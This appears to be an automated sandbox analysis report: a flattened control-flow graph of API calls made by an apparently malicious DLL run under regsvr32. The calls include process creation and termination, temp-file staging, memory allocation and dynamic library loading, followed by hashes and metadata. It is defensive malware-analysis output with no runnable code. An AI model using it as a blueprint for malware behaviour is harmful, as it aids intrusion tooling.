5593->5619 5624 180006344 SleepEx GetSystemTimeAsFileTime 5593->5624 5594->5533 5594->5534 5595 180006225 5598 18000626f HeapFree 5595->5598 5601 180006240 HeapFree 5595->5601 5604 18000625a HeapFree 5595->5604 5596 1800061fb 5655 180007444 GetSystemTimeAsFileTime _snprintf 5596->5655 5598->5594 5601->5595 5602->5595 5602->5596 5604->5595 5607 1800088e9 5606->5607 5608 1800088ec memset 5606->5608 5607->5608 5764 180005448 5608->5764 5611 180008943 5616 180008955 5611->5616 5779 180005df8 5611->5779 5618 180008967 5616->5618 5799 180003fcc 5616->5799 5815 180003e58 5618->5815 5620 180006069 _snprintf 5619->5620 5621 1800060e5 5619->5621 5620->5621 5622 1800060c7 lstrcpyA 5620->5622 5621->5593 5622->5621 5625 1800063a7 5624->5625 5683 1800066a8 5625->5683 5627 1800063d2 5628 1800063e3 lstrlenA lstrlenA HeapAlloc 5627->5628 5629 1800061b8 HeapFree 5627->5629 5630 180006671 HeapFree 5628->5630 5631 180006417 lstrcpyA 5628->5631 5629->5593 5629->5602 5630->5629 5632 180006456 5631->5632 5633 18000642f 5631->5633 5666 1800031d4 5632->5666 5633->5632 5634 180006434 lstrcatA lstrcatA 5633->5634 5634->5632 5637 180006663 HeapFree 5637->5630 5638 18000646e lstrlenA HeapAlloc 5639 1800064ad 5638->5639 5640 180006650 HeapFree 5638->5640 5642 1800066a8 3 API calls 5639->5642 5641 18000665e 5640->5641 5641->5637 5643 1800064e2 5642->5643 5644 180006642 HeapFree 5643->5644 5645 1800064f0 _snprintf HeapFree 5643->5645 5644->5640 5645->5641 5646 180006531 5645->5646 5646->5641 5687 180001208 5646->5687 5649 180006562 HeapAlloc 5649->5644 5650 180006589 5649->5650 5651 1800066a8 3 API calls 5650->5651 5652 1800065be 5651->5652 5653 180006634 HeapFree 5652->5653 5654 1800065c8 _snprintf _snprintf HeapFree 5652->5654 5653->5644 5654->5637 5656 1800074fc HeapAlloc 5655->5656 5660 1800074c8 5655->5660 5657 180007526 _snprintf HeapAlloc 5656->5657 5659 180006222 5656->5659 5658 18000764b HeapFree 5657->5658 5663 180007561 5657->5663 5658->5659 5659->5595 5660->5656 5661 1800074d7 lstrlenA 5660->5661 5661->5660 5662 180007603 _snprintf 5662->5659 5663->5662 5664 180007590 _snprintf memcpy memcpy 5663->5664 5664->5664 5665 1800075f9 5664->5665 5665->5662 5698 180006a84 5666->5698 5669 180003391 5669->5637 5669->5638 5670 18000321e lstrlenA HeapAlloc 5671 180003383 HeapFree 5670->5671 5672 180003250 memcpy lstrcpyA lstrlenA 5670->5672 5671->5669 5673 180001208 14 API calls 5672->5673 5674 180003294 HeapFree 5673->5674 5674->5671 5675 1800032ac 5674->5675 5710 18000467c 5675->5710 5678 180003365 HeapFree HeapFree 5678->5671 5679 1800032f8 HeapAlloc 5680 180003324 UrlEscapeA 5679->5680 5681 180003341 5679->5681 5680->5681 5682 180003350 HeapFree 5680->5682 5681->5678 5682->5678 5684 1800066e8 HeapAlloc 5683->5684 5685 1800066cf Sleep GetSystemTimeAsFileTime 5683->5685 5686 1800066ff 5684->5686 5685->5684 5686->5627 5688 1800012d4 5687->5688 5689 180001249 5687->5689 5688->5644 5688->5649 5689->5688 5690 180001252 EnterCriticalSection LeaveCriticalSection 5689->5690 5739 180009994 5690->5739 5693 180001292 HeapAlloc 5693->5688 5694 1800012aa 5693->5694 5695 180009994 10 API calls 5694->5695 5696 1800012ce 5695->5696 5696->5688 5697 1800012e8 HeapFree 5696->5697 5697->5688 5719 18000702c 5698->5719 5700 180006ac3 5701 1800066a8 3 API calls 5700->5701 5702 180006b20 5701->5702 5703 180003212 5702->5703 5704 1800066a8 3 API calls 5702->5704 5703->5669 5703->5670 5705 180006b34 5704->5705 5706 180006b3c HeapAlloc 5705->5706 5707 180006b7e HeapFree 5705->5707 5708 180006b54 5706->5708 5709 180006b70 HeapFree 5706->5709 5707->5703 5708->5709 5709->5707 5734 1800039a0 5710->5734 5713 1800046c5 HeapAlloc 5714 1800032d0 5713->5714 5715 1800046e0 5713->5715 5714->5678 5714->5679 5716 1800039a0 2 API calls 5715->5716 5717 1800046f3 5716->5717 5717->5714 5718 180004716 HeapFree 5717->5718 5718->5714 5720 18000459c SetLastError 5719->5720 5721 180007053 5720->5721 5722 18000707a 5721->5722 5723 1800070ce GetLastError 5721->5723 5724 18000459c SetLastError 5722->5724 5733 1800070be 5723->5733 5725 180007088 5724->5725 5730 1800070a4 5725->5730 5731 1800070a8 GetLastError 5725->5731 5726 1800070e9 5726->5700 5727 1800070da 5728 180004cfc Sleep GetSystemTimeAsFileTime 5727->5728 5729 1800070e7 5728->5729 5729->5726 5732 18000459c SetLastError 5730->5732 5731->5730 5732->5733 5733->5726 5733->5727 5735 18000459c SetLastError 5734->5735 5736 1800039d9 5735->5736 5737 180003a05 5736->5737 5738 1800039fd GetLastError 5736->5738 5737->5713 5737->5714 5738->5737 5740 1800099a2 5739->5740 5741 18000128b 5740->5741 5743 180004a14 5740->5743 5741->5688 5741->5693 5744 18000459c SetLastError 5743->5744 5745 180004a54 5744->5745 5746 180004a7f 5745->5746 5747 180004c20 GetLastError 5745->5747 5749 180006d04 SetLastError memcpy memset GetLastError 5746->5749 5748 180004c10 5747->5748 5748->5741 5750 180004a9e 5749->5750 5751 180004bf6 5750->5751 5752 180004aa8 memset 5750->5752 5754 18000459c SetLastError 5751->5754 5753 18000459c SetLastError 5752->5753 5755 180004aca 5753->5755 5754->5748 5756 180004ae9 GetLastError 5755->5756 5759 180004af9 5755->5759 5756->5751 5756->5759 5757 180004afd memcpy 5757->5759 5758 18000459c SetLastError 5758->5759 5759->5757 5759->5758 5760 180004bd6 GetLastError 5759->5760 5761 180004bb0 memcpy 5759->5761 5762 180004bde 5760->5762 5761->5759 5761->5762 5763 18000459c SetLastError 5762->5763 5763->5751 5765 1800054a4 5764->5765 5766 180005486 5764->5766 5831 1800027d4 5765->5831 5869 180004dd0 lstrlenA HeapAlloc 5766->5869 5771 18000549a 5771->5611 5771->5618 5772 1800054e2 5772->5771 5774 18000459c SetLastError 5772->5774 5773 180007b04 3 API calls 5773->5772 5775 180005511 5774->5775 5859 180003798 5775->5859 5778 180005545 HeapFree 5778->5771 5780 180005e31 5779->5780 5791 180005fad 5779->5791 5781 18000459c SetLastError 5780->5781 5782 180005e47 5781->5782 5783 180005fb4 GetLastError 5782->5783 5784 18000459c SetLastError 5782->5784 5783->5791 5785 180005e70 5784->5785 5785->5783 5786 180005ea9 5785->5786 5787 18000459c SetLastError 5786->5787 5788 180005ec1 HeapAlloc 5787->5788 5790 180005f0a 5788->5790 5788->5791 5792 18000459c SetLastError 5790->5792 5791->5616 5793 180005f18 5792->5793 5794 180005f95 GetLastError 5793->5794 5795 180005f4b HeapAlloc 5793->5795 5798 180005f9d HeapFree 5794->5798 5796 180005f75 wcstombs 5795->5796 5797 180005f8e 5795->5797 5796->5798 5797->5798 5798->5791 5800 18000459c SetLastError 5799->5800 5801 180003ffc 5800->5801 5802 180004151 GetLastError 5801->5802 5803 180004018 5801->5803 5804 18000412f 5802->5804 5803->5804 5805 18000403c HeapAlloc 5803->5805 5804->5618 5805->5804 5813 180004059 5805->5813 5806 1800040b7 GetLastError 5807 1800040bf WaitForSingleObject 5806->5807 5808 18000410b 5807->5808 5807->5813 5810 180004110 HeapFree 5808->5810 5809 18000459c SetLastError 5809->5813 5810->5804 5811 180004122 5810->5811 5884 1800085e4 5811->5884 5813->5806 5813->5807 5813->5809 5813->5810 5814 180004101 GetLastError 5813->5814 5814->5810 5816 180003e7f 5815->5816 5819 180003e8d 5815->5819 5817 18000459c SetLastError 5816->5817 5817->5819 5818 180003ead 5821 180003ecd 5818->5821 5824 18000459c SetLastError 5818->5824 5819->5818 5820 18000459c SetLastError 5819->5820 5820->5818 5822 180003ee1 HeapFree 5821->5822 5823 180003eec 5821->5823 5822->5823 5825 180003ef5 HeapFree 5823->5825 5826 180003f00 5823->5826 5824->5821 5825->5826 5827 180003f14 5826->5827 5828 180003f09 HeapFree 5826->5828 5829 180003f28 HeapFree 5827->5829 5830 180003f1d HeapFree 5827->5830 5828->5827 5829->5545 5830->5829 5832 180007b04 3 API calls 5831->5832 5834 180002815 5832->5834 5833 180002a78 GetLastError 5858 180002a5d 5833->5858 5834->5833 5835 18000459c SetLastError 5834->5835 5836 180002854 HeapFree 5835->5836 5836->5833 5838 180002890 5836->5838 5839 18000459c SetLastError 5838->5839 5841 1800028a7 5838->5841 5839->5841 5840 180007b04 3 API calls 5842 1800028d9 5840->5842 5841->5833 5841->5840 5842->5833 5843 18000459c SetLastError 5842->5843 5845 18000290f 5842->5845 5843->5845 5844 18000459c SetLastError 5846 18000294c HeapFree 5844->5846 5845->5844 5846->5833 5848 180002982 5846->5848 5849 180007b04 3 API calls 5848->5849 5850 18000298d 5849->5850 5850->5833 5851 18000459c SetLastError 5850->5851 5852 1800029a7 5851->5852 5853 1800029f0 HeapFree 5852->5853 5853->5833 5854 180002a08 5853->5854 5855 18000459c SetLastError 5854->5855 5856 180002a1f 5855->5856 5857 18000459c SetLastError 5856->5857 5856->5858 5857->5858 5858->5771 5858->5772 5858->5773 5864 1800037d2 5859->5864 5860 18000459c SetLastError 5860->5864 5861 180003823 GetLastError 5861->5864 5862 18000388c 5863 1800038dc 5862->5863 5865 18000459c SetLastError 5862->5865 5863->5771 5863->5778 5864->5860 5864->5861 5864->5862 5864->5863 5868 180003884 GetLastError 5864->5868 5866 1800038ac 5865->5866 5866->5863 5867 1800038d4 GetLastError 5866->5867 5867->5863 5868->5862 5870 180004e26 HeapAlloc 5869->5870 5878 180004e9c 5869->5878 5871 180004ea9 HeapFree 5870->5871 5872 180004e3c 5870->5872 5871->5878 5880 180004994 5872->5880 5875 180004e6d memcpy lstrcpyA 5875->5878 5876 180004e8e lstrcpyA 5876->5878 5877 180004994 strchr 5879 180004e5f 5877->5879 5878->5765 5878->5771 5879->5875 5879->5876 5881 1800095bc 5880->5881 5882 1800049ab strchr 5881->5882 5883 1800049c0 5882->5883 5883->5877 5883->5879 5885 18000861b 5884->5885 5886 180008623 HeapAlloc 5885->5886 5888 18000868b 5885->5888 5887 18000863a 5886->5887 5886->5888 5887->5888 5889 18000867b HeapFree 5887->5889 5888->5804 5889->5888 5891 18000823c 5890->5891 5894 1800082db 5890->5894 5892 18000826a HeapAlloc 5891->5892 5891->5894 5893 180008286 memset memcpy memcpy 5892->5893 5892->5894 5893->5894 5894->5573 5896 180006ef8 5895->5896 5897 180006fe7 5896->5897 5898 180006f12 HeapAlloc 5896->5898 5897->5578 5897->5579 5898->5897 5899 180006f2f 5898->5899 5907 180006bac 5899->5907 5902 180007003 HeapFree 5902->5897 5903 180004a14 10 API calls 5904 180006fbc 5903->5904 5904->5902 5905 180002594 2 API calls 5904->5905 5906 180006fd6 5905->5906 5906->5897 5906->5902 5908 180006be3 5907->5908 5909 180006bd9 5907->5909 5913 18000a5a0 5908->5913 5909->5902 5909->5903 5912 180006c49 memcpy memset 5912->5909 5924 18000118c 5913->5924 5916 18000118c memset 5917 18000a5f9 5916->5917 5918 18000118c memset 5917->5918 5919 18000a613 5918->5919 5920 180006bfa 5919->5920 5928 180001eec memcpy 5919->5928 5920->5909 5920->5912 5922 18000a686 5923 18000a6a3 memset memset 5922->5923 5923->5920 5927 1800011aa 5924->5927 5925 1800011e6 memset 5926 1800011fb 5925->5926 5926->5916 5927->5925 5927->5926 5936 180003934 5928->5936 5930 180001f5b 5931 180003934 9 API calls 5930->5931 5932 180001f80 memset 5931->5932 5935 180001f9a 5932->5935 5933 180002081 memcpy memset memset 5933->5922 5934 180003934 9 API calls 5934->5935 5935->5933 5935->5934 5937 1800095c4 memset memcpy memset 5936->5937 5938 180003960 5937->5938 5939 180006298 memset memset memset memset memset 5938->5939 5940 180003978 memset 5939->5940 5940->5930 5942 18000588b 5941->5942 5943 18000578d 5941->5943 5944 180005896 WaitForSingleObject 5942->5944 5950 1800058ec 5942->5950 5943->5942 5945 180005861 5943->5945 5946 1800057a3 5943->5946 5944->5950 5947 1800024cc 2 API calls 5945->5947 5951 1800057dd 5945->5951 5946->5945 5949 180005938 5946->5949 5946->5950 5953 1800057c4 5946->5953 5959 180005875 5947->5959 5948 1800015ea HeapFree 5948->5451 5949->5951 5952 18000599a 5949->5952 5956 180007950 13 API calls 5949->5956 5950->5949 5950->5951 5954 180005914 memset 5950->5954 5951->5948 5990 180005600 lstrlenA HeapAlloc 5951->5990 5952->5951 5986 180001a88 HeapAlloc 5952->5986 5953->5945 5957 1800057cf 5953->5957 5973 1800020dc lstrlenA memset HeapAlloc 5954->5973 5960 180005988 HeapFree 5956->5960 5961 180005852 SetEvent 5957->5961 5964 1800057d6 5957->5964 5959->5951 5963 180002668 8 API calls 5959->5963 5960->5952 5961->5951 5969 18000581b 5963->5969 5964->5951 5970 1800024cc HeapAlloc 5964->5970 5967 18000582e HeapFree 5967->5951 5968 180002668 8 API calls 5968->5969 5969->5951 5969->5967 5971 180002511 5970->5971 5972 1800024ff memcpy 5970->5972 5971->5951 5971->5968 5972->5971 5974 180002163 memcpy 5973->5974 5975 180002287 5973->5975 5977 18000217d 5974->5977 5975->5949 5976 18000459c SetLastError 5979 1800021e9 5976->5979 5977->5976 5978 180002279 HeapFree 5977->5978 5978->5975 5980 18000459c SetLastError 5979->5980 5981 180002235 5979->5981 5984 18000220b 5980->5984 5981->5978 5982 18000459c SetLastError 5981->5982 5983 180002272 5982->5983 5983->5978 5984->5981 5985 18000459c SetLastError 5984->5985 5985->5981 5987 180001ad2 memset 5986->5987 5988 180001b1c 5986->5988 5995 180003a24 5987->5995 5988->5951 5991 18000565a GetSystemTime _snprintf EnterCriticalSection 5990->5991 5992 18000572f 5990->5992 5993 1800056dc LeaveCriticalSection HeapFree 5991->5993 5992->5948 5993->5992 5996 180003a53 5995->5996 5997 180003a5b memcpy InitializeCriticalSection CreateEventA 5995->5997 6002 180007950 13 API calls 5996->6002 5998 180003bd6 GetLastError 5997->5998 5999 180003ada CreateEventA 5997->5999 5998->5996 6000 180003bfc 5998->6000 5999->5998 6001 180003af8 CreateMutexA 5999->6001 6000->5988 6001->5998 6003 180003b1a 6001->6003 6004 180003bea 6002->6004 6005 180001c00 4 API calls 6003->6005 6004->6000 6007 18000459c SetLastError 6004->6007 6006 180003b24 6005->6006 6008 18000459c SetLastError 6006->6008 6007->6000 6009 180003b35 6008->6009 6010 18000459c SetLastError 6009->6010 6016 180003b90 6009->6016 6014 180003b66 6010->6014 6013 180003bcc SwitchToThread 6013->6000 6014->5998 6015 18000459c SetLastError 6014->6015 6015->6016 6016->5998 6017 180006c8c 6016->6017 6018 18000459c SetLastError 6017->6018 6019 180003bc3 6018->6019 6019->5998 6019->6013 6021 180008326 6020->6021 6022 18000799c 6020->6022 6023 18000459c SetLastError 6021->6023 6022->5461 6022->5462 6024 180008334 6023->6024 6025 18000459c SetLastError 6024->6025 6025->6022 6118 7ffa0ae612e9 6119 7ffa0ae612f5 FlushConsoleInputBuffer 6118->6119 6086 180007a7c 6087 180007ab9 6086->6087 6088 180007a9d TerminateProcess CloseHandle CloseHandle 6086->6088 6089 180007ad2 6087->6089 6090 180007ac2 CloseHandle CloseHandle 6087->6090 6088->6087 6091 180007aeb HeapFree 6089->6091 6092 180007adb CloseHandle CloseHandle 6089->6092 6090->6089 6092->6091 6050 180001000 CreateFileW 6051 1800010c8 GetLastError 6050->6051 6052 180001059 GetFileSize 6050->6052 6054 18000106a 6051->6054 6053 180001071 HeapAlloc 6052->6053 6052->6054 6053->6051 6055 180001088 ReadFile 6053->6055 6056 1800010d6 CloseHandle 6054->6056 6057 1800010df 6054->6057 6055->6051 6055->6054 6056->6057 6058 1800010f6 6057->6058 6059 1800010e8 HeapFree 6057->6059 6059->6058 5080 180001844 5081 18000187a 5080->5081 5082 180001a6a 5080->5082 5081->5082 5103 180007b04 lstrlenA HeapAlloc 5081->5103 5085 180001899 GetTempPathW 5086 180001a55 5085->5086 5087 1800018b9 HeapAlloc 5085->5087 5088 180001a5a HeapFree 5086->5088 5087->5086 5089 1800018d5 GetTempPathW 5087->5089 5088->5082 5090 1800018e5 GetSystemTimeAsFileTime GetCurrentThreadId GetTempFileNameW 5089->5090 5091 180001916 HeapFree 5089->5091 5090->5091 5094 180001927 5090->5094 5091->5094 5092 180001938 StrChrW 5093 180001964 lstrlenW 5092->5093 5092->5094 5093->5094 5094->5086 5094->5092 5095 1800019ef 5094->5095 5097 1800019f4 5094->5097 5098 180001a3c DeleteFileW HeapFree 5094->5098 5107 180009b7c lstrlenA lstrlenW lstrlenW HeapAlloc 5094->5107 5095->5097 5095->5098 5112 180003698 5097->5112 5098->5088 5104 180007b54 5103->5104 5105 18000188d 5103->5105 5106 180007b62 memset 5104->5106 5105->5082 5105->5085 5106->5105 5108 180009bed wnsprintfW 5107->5108 5109 180009c2e 5107->5109 5127 180006754 memset 5108->5127 5109->5094 5149 180001000 CreateFileW 5112->5149 5115 1800036d7 HeapAlloc 5117 180003709 RtlOemStringToUnicodeString 5115->5117 5118 18000375a HeapFree 5115->5118 5116 180001a09 5116->5098 5123 180005bdc 5116->5123 5119 180003731 5117->5119 5120 180003727 RtlNtStatusToDosError 5117->5120 5118->5116 5159 180005a0c WideCharToMultiByte 5119->5159 5121 180003748 HeapFree 5120->5121 5121->5118 5124 180001a27 HeapFree 5123->5124 5125 180005c0b HeapAlloc 5123->5125 5124->5098 5125->5124 5126 180005c23 memcpy EnterCriticalSection LeaveCriticalSection 5125->5126 5126->5124 5138 1800089e4 5127->5138 5130 180006801 WaitForMultipleObjects 5133 18000684a CloseHandle CloseHandle 5130->5133 5134 180006830 5130->5134 5131 180006862 GetLastError 5132 18000686a 5131->5132 5136 18000687d HeapFree 5132->5136 5137 18000686f HeapFree 5132->5137 5133->5132 5134->5133 5135 18000683f TerminateProcess 5134->5135 5135->5133 5136->5109 5137->5136 5139 180008a19 5138->5139 5140 1800067b1 CreateProcessW 5139->5140 5141 18000459c SetLastError 5139->5141 5140->5130 5140->5131 5142 180008a38 5141->5142 5142->5140 5143 180008a51 HeapAlloc 5142->5143 5143->5140 5144 180008a6b 5143->5144 5145 18000459c SetLastError 5144->5145 5146 180008a79 5145->5146 5147 180008a91 5146->5147 5148 180008a9d HeapFree 5146->5148 5147->5140 5148->5140 5150 1800010c8 GetLastError 5149->5150 5151 180001059 GetFileSize 5149->5151 5153 18000106a 5150->5153 5152 180001071 HeapAlloc 5151->5152 5151->5153 5152->5150 5154 180001088 ReadFile 5152->5154 5155 1800010d6 CloseHandle 5153->5155 5156 1800010df 5153->5156 5154->5150 5154->5153 5155->5156 5157 1800010f6 5156->5157 5158 1800010e8 HeapFree 5156->5158 5157->5115 5157->5116 5158->5157 5160 180005ad3 GetLastError 5159->5160 5161 180005a6a HeapAlloc 5159->5161 5162 180005aaa 5160->5162 5161->5162 5163 180005a80 WideCharToMultiByte 5161->5163 5162->5121 5163->5162 5164 180005ab4 GetLastError HeapFree 5163->5164 5164->5162 6212 180009344 6213 18000938a 6212->6213 6217 1800094a7 6212->6217 6214 18000459c SetLastError 6213->6214 6215 180009398 6214->6215 6216 18000459c SetLastError 6215->6216 6215->6217 6218 1800093fb 6216->6218 6218->6217 6224 1800070fc memcpy 6218->6224 6221 180009479 6221->6217 6222 18000459c SetLastError 6221->6222 6222->6217 6225 180007189 6224->6225 6226 180007159 6224->6226 6242 18000417c 6225->6242 6226->6225 6228 18000716c memcpy 6226->6228 6228->6226 6230 18000719b 6231 1800071ee 6230->6231 6248 180004748 6230->6248 6231->6217 6231->6221 6232 180007358 6231->6232 6233 18000738b 6232->6233 6261 1800062d8 6233->6261 6236 1800073b4 GetModuleHandleA 6240 1800073d3 6236->6240 6237 1800073e3 6238 180007b04 3 API calls 6237->6238 6237->6240 6239 1800073f2 6238->6239 6239->6240 6241 180007404 HeapFree 6239->6241 6240->6221 6241->6240 6243 180004217 6242->6243 6246 1800041ac 6242->6246 6243->6230 6244 180004206 GetLastError 6244->6246 6245 18000459c SetLastError 6245->6246 6246->6243 6246->6244 6246->6245 6257 180003cc0 6246->6257 6249 18000459c SetLastError 6248->6249 6250 1800047a3 6249->6250 6251 18000490c GetLastError 6250->6251 6254 1800047c7 6250->6254 6252 18000490a 6251->6252 6252->6231 6253 18000459c SetLastError 6253->6254 6254->6252 6254->6253 6255 1800048d4 GetLastError 6254->6255 6256 180004875 GetLastError 6254->6256 6255->6254 6256->6254 6258 180003d04 6257->6258 6260 180003de7 6257->6260 6259 18000459c SetLastError 6258->6259 6258->6260 6259->6258 6260->6246 6262 180006309 6261->6262 6263 180006324 6261->6263 6262->6263 6265 180001624 6262->6265 6263->6236 6263->6237 6263->6240 6266 18000165e 6265->6266 6267 180001696 lstrlenA 6266->6267 6268 180001667 6266->6268 6267->6268 6268->6263 6318 180001b84 6319 180001bb8 6318->6319 6320 180001bce HeapFree 6319->6320 6321 180005600 7 API calls 6319->6321 6321->6320 6073 180004c4c 6074 180004c6d EnterCriticalSection LeaveCriticalSection 6073->6074 6077 180002770 6074->6077 6078 180008308 SetLastError 6077->6078 6079 180002782 6078->6079 6080 180008308 SetLastError 6079->6080 6081 18000278a 6080->6081 6082 180002791 GetCurrentThreadId 6081->6082 6083 1800027b3 6081->6083 6084 1800027a9 CloseHandle 6082->6084 6085 18000279c WaitForSingleObject 6082->6085 6084->6083 6085->6084 6046 7ffa0ae61812 6047 7ffa0ae6181c VirtualAlloc 6046->6047 6049 7ffa0ae618da 6047->6049 6060 180001110 6061 18000459c SetLastError 6060->6061 6062 18000113c 6061->6062 6063 180001143 CreateThread 6062->6063 6064 18000115e 6062->6064 6063->6064 6065 180001175 6064->6065 6066 180001166 GetLastError 6064->6066 6066->6065 6322 7c01d3 6323 7c01c6 6322->6323 6325 7c01de 6322->6325 6325->6322 6325->6323 6326 7c0219 6325->6326 6328 7c3edc 6325->6328 6326->6323 6332 7c1c0b 6326->6332 6330 7c3f1a 6328->6330 6329 7c4020 6329->6325 6330->6329 6331 7c40bd RtlAllocateHeap 6330->6331 6331->6329 6333 7c1c14 6332->6333 6334 7c1c29 6332->6334 6333->6326 6334->6333 6335 7c1c1e RtlAllocateHeap 6334->6335 6335->6333 5048 180004a14 5069 18000459c 5048->5069 5051 180004a7f 5073 180006d04 memcpy 5051->5073 5052 180004c20 GetLastError 5053 180004c10 5052->5053 5056 180004bf6 5059 18000459c SetLastError 5056->5059 5057 180004aa8 memset 5058 18000459c SetLastError 5057->5058 5060 180004aca 5058->5060 5059->5053 5061 180004ae9 GetLastError 5060->5061 5064 180004af9 5060->5064 5061->5056 5061->5064 5062 180004afd memcpy 5062->5064 5063 18000459c SetLastError 5063->5064 5064->5062 5064->5063 5065 180004bd6 GetLastError 5064->5065 5066 180004bb0 memcpy 5064->5066 5067 180004bde 5065->5067 5066->5064 5066->5067 5068 18000459c SetLastError 5067->5068 5068->5056 5071 1800045b0 5069->5071 5070 1800045d3 SetLastError 5072 1800045de 5070->5072 5071->5070 5071->5072 5072->5051 5072->5052 5074 180006d61 memset 5073->5074 5075 180006d73 5073->5075 5074->5075 5076 18000459c SetLastError 5075->5076 5077 180006d81 5076->5077 5078 180006da8 GetLastError 5077->5078 5079 180004a9e 5077->5079 5078->5079 5079->5056 5079->5057 6067 180003e14 6068 18000459c SetLastError 6067->6068 6069 180003e29 6068->6069 6093 18000a494 6094 18000a4a0 6093->6094 6097 18000a6ec 6094->6097 6096 18000a4df 6096->6096 6098 18000a76b RaiseException 6097->6098 6109 18000a790 6097->6109 6100 18000a994 6098->6100 6099 18000a824 LoadLibraryA 6101 18000a837 GetLastError 6099->6101 6102 18000a88f 6099->6102 6100->6096 6105 18000a84d 6101->6105 6106 18000a85f RaiseException 6101->6106 6107 18000a8cb FreeLibrary 6102->6107 6108 18000a89b 6102->6108 6103 18000a8b4 6103->6100 6104 18000a92b GetProcAddress 6103->6104 6104->6100 6110 18000a941 GetLastError 6104->6110 6105->6102 6105->6106 6106->6100 6107->6103 6108->6103 6111 18000a8a1 LocalAlloc 6108->6111 6109->6099 6109->6100 6109->6102 6109->6103 6112 18000a957 6110->6112 6111->6103 6112->6100 6113 18000a969 RaiseException 6112->6113 6113->6100 6121 7ffa0ae612bd GetCurrentConsoleFont 6122 7ffa0ae612c7 GetConsoleMode 6121->6122 6123 7ffa0ae612a3 6121->6123 6122->6123 6137 18000a519 6138 18000a525 6137->6138 6139 18000a6ec 9 API calls 6138->6139 6140 18000a564 6139->6140 6125 7ffa0ae610c6 PeekConsoleInputA 6126 7ffa0ae610b0 6125->6126 6127 7ffa0ae610d0 6125->6127 6127->6126 6128 7ffa0ae61275 FlushConsoleInputBuffer 6127->6128 6141 18000431c WaitForSingleObject 6142 18000449d 6141->6142 6143 18000435d 6141->6143 6144 18000459c SetLastError 6142->6144 6145 18000459c SetLastError 6143->6145 6150 1800044a7 6144->6150 6146 180004367 memcpy 6145->6146 6162 180004386 6146->6162 6148 18000459c SetLastError 6148->6162 6149 180004568 GetLastError 6151 180004570 ReleaseMutex 6149->6151 6150->6149 6152 18000459c SetLastError 6150->6152 6153 1800044e0 6152->6153 6153->6149 6155 1800044fa SetEvent 6153->6155 6154 18000444d GetLastError 6154->6162 6164 180004504 6155->6164 6156 180004481 WaitForSingleObject 6158 180004498 6156->6158 6156->6162 6157 180004461 ResetEvent WaitForSingleObject 6157->6162 6158->6151 6159 18000459c SetLastError 6159->6164 6160 180004435 GetLastError 6160->6156 6160->6162 6162->6148 6162->6154 6162->6156 6162->6157 6162->6160 6163 180008308 SetLastError 6162->6163 6165 18000440c SetEvent 6162->6165 6168 180008150 6162->6168 6163->6162 6164->6149 6164->6159 6166 1800091f8 10 API calls 6164->6166 6175 1800091f8 6165->6175 6166->6164 6184 180002a9c memset 6168->6184 6170 18000459c SetLastError 6171 180008181 6170->6171 6171->6170 6172 1800081c2 6171->6172 6173 1800081c0 6171->6173 6172->6173 6174 1800081c4 GetLastError 6172->6174 6173->6162 6174->6173 6176 180009221 6175->6176 6177 180009266 GetSystemTimeAsFileTime EnterCriticalSection LeaveCriticalSection 6176->6177 6178 180009322 6176->6178 6179 180006c8c SetLastError 6177->6179 6180 180009331 6178->6180 6182 180002770 4 API calls 6178->6182 6181 1800092d4 6179->6181 6180->6162 6181->6180 6183 1800092e9 GetLastError EnterCriticalSection LeaveCriticalSection 6181->6183 6182->6180 6183->6178 6183->6180 6185 180002b43 6184->6185 6186 180002ad7 lstrcpynA 6184->6186 6185->6171 6187 180002af6 6186->6187 6188 18000459c SetLastError 6187->6188 6189 180002b1a 6188->6189 6189->6185 6190 180002b39 GetLastError 6189->6190 6190->6185 6030 7c0000 6031 7c0002 6030->6031 6033 7c0017 6031->6033 6034 7c01c1 6031->6034 6035 7c03a5 6034->6035 6037 7c37a7 6035->6037 6038 7c37a9 6037->6038 6040 7c37ae 6038->6040 6041 7c3880 6038->6041 6040->6035 6042 7c3882 6041->6042 6043 7c3a5f RtlAllocateHeap 6042->6043 6045 7c392e 6042->6045 6044 7c3c82 6043->6044 6044->6040 6045->6040 6269 180007760 6270 1800077a6 6269->6270 6271 18000782b memcmp 6270->6271 6275 180007885 6270->6275 6274 180007844 6271->6274 6271->6275 6272 1800078b1 6276 1800078a9 6272->6276 6277 1800078b6 memcmp 6272->6277 6273 180007890 memcmp 6273->6276 6278 180007b04 3 API calls 6274->6278 6275->6272 6275->6273 6279 1800088b4 39 API calls 6276->6279 6277->6276 6280 18000784f 6278->6280 6281 180007909 6279->6281 6280->6281 6283 180001000 7 API calls 6280->6283 6282 180007914 6281->6282 6284 180007928 HeapFree 6281->6284 6285 180007870 HeapFree 6283->6285 6284->6282 6285->6281

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$Free$AllocTime$_snprintflstrlen$FileSleepSystemlstrcat$lstrcpy
                  • String ID:
                  • API String ID: 4119021385-0
                  • Opcode ID: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
                  • Instruction ID: 6db0b8cd80ef826fc55d87cfc33604410ea95bd32740a9bcb331c0de9eda71bb
                  • Opcode Fuzzy Hash: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
                  • Instruction Fuzzy Hash: 05919431214A4986E785DF26E8043DAB3A1F78DFC4F548121FE4A83764EE39C60EC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
